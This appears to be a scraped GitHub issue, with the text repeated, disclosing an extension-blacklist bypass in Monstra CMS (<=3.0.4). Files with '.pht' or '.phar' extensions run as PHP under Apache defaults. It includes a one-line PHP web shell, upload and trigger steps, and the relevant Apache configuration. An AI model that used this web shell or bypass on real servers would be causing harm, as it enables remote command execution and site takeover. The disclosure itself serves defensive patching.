Brief of this vulnerability
In uploading process, Monstra filters some of dangerous extensions using blacklist. But it is not perfect because default setting of "libapache2-mod-php" allow some extensions to execute php scripts.
Test Environment
Apache/2.4.10 (Debian)
PHP 5.6.33-0+deb8u1 (cli)
Affect version
<=3.0.4
Payload
move to http://[address]:[port]/[app_path]/admin/index.php?id=filesmanager with login
Save php codes with '.pht' extensions. and upload it like below.
# cmd.pht
<?php system($_GET['c']);?>
Click the uploaded file name or
move to http://[address]:[port]/[app_path]/public/uploads/[uploaded file]
Profit!
Reason of This Vulnerability
Default setting of php5 module for apache2(libapache2-mod-php5) allow several extensions to execute as php script. This is some part of /etc/apache2/mods-enabled/php5.conf.
#/etc/apache2/mods-enabled/php5.conf
<FilesMatch ".+\.ph(p[345]?|t|tml)$">
SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch ".+\.phps$">
SetHandler application/x-httpd-php-source
# Deny access to raw php sources by default
# To re-enable it's recommended to enable access to the files
# only in specific virtual host or directory
Require all denied
</FilesMatch>
Because of this config, list of extension allowed to run php script is php, php3, php4, php5, **pht**, phtml
and 'phps' extension shows source code of php file.
But Monstra prevent to upload php-style files using extension filer in uploading process at ./plugins/box/filesmanager/filesmanager.admin.php like below.
Almost allowed extensions to execute as php can be filtered but 'pht' is not.
As a result, attacker can upload malicious php file using pht extensions.
Similar with this, default setting of 'libapache2-mod-php7.1' like this.
#OS:ubuntu 17.10
#/etc/apache2/mods-enabled/php7.1.conf
<FilesMatch ".+\.ph(ar|p|tml)$">
SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch ".+\.phps$">
SetHandler application/x-httpd-php-source
# Deny access to raw php sources by default
# To re-enable it's recommended to enable access to the files
# only in specific virtual host or directory
Require all denied
</FilesMatch>
So, phar extension can also be vulnerable in php7 environment.
The text was updated successfully, but these errors were encountered:
Hexife
changed the title
'pht' extension can bypassed extension filter in uploading process
Some extension can bypassed extension filter in uploading process
Jan 29, 2018
Brief of this vulnerability
In uploading process, Monstra filters some of dangerous extensions using blacklist. But it is not perfect because default setting of "libapache2-mod-php" allow some extensions to execute php scripts.
Test Environment
Affect version
<=3.0.4
Payload
move to
http://[address]:[port]/[app_path]/admin/index.php?id=filesmanagerwith loginSave php codes with '.pht' extensions. and upload it like below.
Click the uploaded file name or
move to
http://[address]:[port]/[app_path]/public/uploads/[uploaded file]Profit!
Reason of This Vulnerability
Default setting of php5 module for apache2(libapache2-mod-php5) allow several extensions to execute as php script. This is some part of
/etc/apache2/mods-enabled/php5.conf.Because of this config, list of extension allowed to run php script is
php, php3, php4, php5, **pht**, phtmland 'phps' extension shows source code of php file.
But Monstra prevent to upload php-style files using extension filer in uploading process at
./plugins/box/filesmanager/filesmanager.admin.phplike below.Almost allowed extensions to execute as php can be filtered but 'pht' is not.
As a result, attacker can upload malicious php file using
phtextensions.Similar with this, default setting of 'libapache2-mod-php7.1' like this.
So,
pharextension can also be vulnerable in php7 environment.The text was updated successfully, but these errors were encountered: